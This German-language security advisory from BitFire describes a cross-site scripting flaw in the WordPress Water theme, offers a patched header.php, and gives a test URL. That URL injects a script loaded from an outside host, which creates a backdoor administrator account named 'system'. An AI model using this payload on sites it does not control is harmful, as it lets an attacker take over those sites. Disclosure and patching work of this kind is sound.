WordPress Water Theme Cross Site Scripting Schwachstelle
Written by: Cory Marsh Published by: BitFire
on
on
Am 6. August 2021 veröffentlichte BitFire eine Cross-Site Scripting Schwachstelle für das WordPress Water Theme. Zum Zeitpunkt der Erstellung dieses Artikels gibt es mehrere hundert Webseiten, die das Theme verwenden. Mehrere ungeprüfte und un-escapte GET-Variablen werden zu einem Link-Tag im Kopf der Seite hinzugefügt, was zu einer Cross-Site-Scripting-Schwachstelle führt. Es ist möglich, dass die gesamte Seite kompromittiert wird, wenn der Administrator der Seite auf einen bösartigen Link klickt.
Diese Schwachstelle ermöglicht es einem Angreifer, einen Link zur Zielseite zu erstellen, der dazu führen kann, dass ein Backdoor-Administratorkonto auf der verwundbaren Seite erstellt wird, wenn der Administrator der Seite darauf klickt. Der Backdoor-Account könnte dazu verwendet werden, Malware auf die Zielseite hochzuladen und den Zugriff des eigentlichen Seitenadministrators zu beschränken.
Der Theme-Entwickler konnte nicht erreicht werden, um einen Patch für dieses Problem zu erstellen. Die folgende Patch-Datei wird von BitFire zur Verfügung gestellt. Lade die gepatchte header.php Datei mit diesem Link herunter: header.php. Ersetze dann die Datei wp-content/themes/water/header.php mit dieser gepatchten Version.
Wenn deine Seite verwundbar ist, kannst du jeden beliebigen Beitrag (nicht die Homepage) auf deiner Seite besuchen und das Folgende an diese URL anhängen:
?preview=true&stylesheet="><script+src=https://bitfire.co/tools/wpadmin.php><&template=z
Wenn deine Seite verwundbar ist, wird ein neuer Administrator-Benutzer namens system mit dem gehackten Passwort erstellt. Achte darauf, dass du diesen Account danach wieder entfernst. Wenn der Patch erfolgreich ist, oder deine Seite eine WordPess Firewall hat, wird kein Benutzerkonto erstellt.
BitFire Kunden sind bereits vor dieser und hunderten anderen Sicherheitslücken geschützt. Schau dir unser Anleitung zur Sicherung deiner WordPress oder anderen PHP Seite für Anleitungen, wie du verhindern kannst, dass deine Seite gehackt wird.
Find out the best tricks and tips to secure your website.
From us to your inbox weekly.